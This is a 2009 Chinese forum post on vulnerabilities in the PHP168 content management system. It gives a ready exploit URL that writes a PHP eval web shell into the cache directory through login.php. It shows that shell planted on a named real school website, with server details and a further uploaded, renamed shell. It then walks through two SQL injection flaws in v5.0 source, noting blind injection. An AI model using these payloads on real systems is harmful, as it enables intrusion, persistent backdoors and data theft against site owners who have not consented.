PHP168所有漏洞

dirtysea · 发表于 2009-12-22 12:39:36

PHP168 6.0以下版本漏洞【PHP168的V6版本中无效...】
没什么大用...也是公开的秘密了。。
公布不公布都很多人知道的，直接将PHP一句话写入cache目录
不过PHP168的V6版本中无效...

漏洞存在login.php
利用代码网站URL后直接输入

login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=<?php%20@eval($_POST[a]);?>
可以直接写一句话到 cache/shell.php
用PHP一句话连接器连接【lanker微型PHP+ASP管理器1.0双用版】
实战：
Powered by php168 V5.0 Code -V6.0
[url=http://www.lcqmxx.com/login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=<?php%20@ev<wbr]http://www.lcqmxx.com/login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=<?php%20@eval($_POST[a[/url]]);?>
http://www.lcqmxx.com/cache/shell.php
服务器系统:WINNT
服务器操作系统文字编码:zh-cn
服务器IP:www.lcqmxx.com
Web服务端口端口:80
PHP运行方式:CGI-FCGI
PHP版本:5.1.2
本文件路径:
这样我想到一个方法，文件路径不写为空，哈哈，拿到了
upfile:1.php OK!
http://www.lcqmxx.com/cache/1.php
改名为
http://www.lcqmxx.com/cache/cache.edw.php

这是继Php168 v6 权限提升漏洞【类似php 168 2008的权限提升】
黑客X档案0909期爆出来了，我就不写了，直接传图片。

php168 v5.0 注入漏洞

   首页调用了require(PHP168_PATH."inc/label.php");
   继续跟进;
label.php
      if($jobs=='show')
{
      if(!$_COOKIE[Admin])
      {
            showerr("ÄãÎÞÈ¨²é¿´");
      }
      //»ñÈ¡Í·ÓëÎ²µÄ±êÇ©
      preg_replace('/\$label\[([a-zA-Z0-9\_]+)\]/eis',"label_array_hf('\\1')",read_file(html("head",$head_tpl)));
      preg_replace('/\$label\[([a-zA-Z0-9\_]+)\]/eis',"label_array_hf('\\1')",read_file(html("foot",$foot_tpl)));
      //$label_hfÎªÍ·²¿µÄ¼ìË÷Êý×é,¼ì²éÍ·²¿ÓÐ¶àÉÙ¸ö±êÇ©
      is_array($label_hf) || $label_hf=array();                                        //---------- 注意！
      foreach($label_hf AS $key=>$value)
      {
            $rs=$db->get_one("SELECT * FROM {$pre}label WHERE ch='$ch' AND tag='$key' AND module='$ch_module' AND chtype='99'");
            if($rs[tag])
            {
                     $divdb=unserialize($rs[divcode]);
                     $label[$key]=add_div($label[$key]?$label[$key]:' ',$rs[tag],$rs[type],$divdb[div_w],$divdb[div_h],$divdb[div_bgcolor],'99');
            }
            else
            {
                     $label[$key]=add_div("ÐÂ±êÇ©,ÎÞÄÚÈÝ",$key,'NewTag','','','','99');
            }
      }

         $label_hf数组并没有初始化，接着有个循环将它的下标$key放进了sql语句,加上addcslashes不处理数组下标的问题，造成注入漏洞，不爽的是语句的返回没有表现在首页上，所以能盲注喽！

php168 v5.0 另一处注入漏洞
   member/list.php
   if($step==2)
{
      if(!$aidDB)                                                                         //-----------------------------------------
      {
            showerr("ÇëÖÁÉÙÑ¡ÔñÒ»ÆªÎÄÕÂ");
      }
      elseif(!$Type)
      {
            showerr("ÇëÑ¡Ôñ²Ù×÷Ä¿±ê,ÊÇÉ¾³ý»¹ÊÇÉóºËµÈ...");
      }
      if($Type=='yz'){
            if($T_yz<1){
                     $Type=='unyz';
            }
      }elseif($Type=='leavels'){
            if($levels<1){
                     $Type='uncom';
            }
            else{
                     $levels=1;
                     $Type='com';
            }
      }
      if($Type=='delete'){
            make_more_article_html("$FROMURL","del_0",$aidDB);
      }

function make_more_article_html($comebackurl='/',$type='',$aidDB=''){
      global $db,$pre,$webdb,$webdb;
      if($webdb[NewsMakeHtml]!=1||$aidDB=='')
      {
            return ;
      }
      $string=implode(",",$aidDB);
      $query = $db->query("SELECT A.*,B.bencandy_html,B.list_html FROM {$pre}article A LEFT JOIN {$pre}sort B ON A.fid=B.fid WHERE A.aid IN ($string)");
      while($rs = $db->fetch_array($query)){

   $aidDB没有过滤就**了

		自动登录	找回密码
密码			注册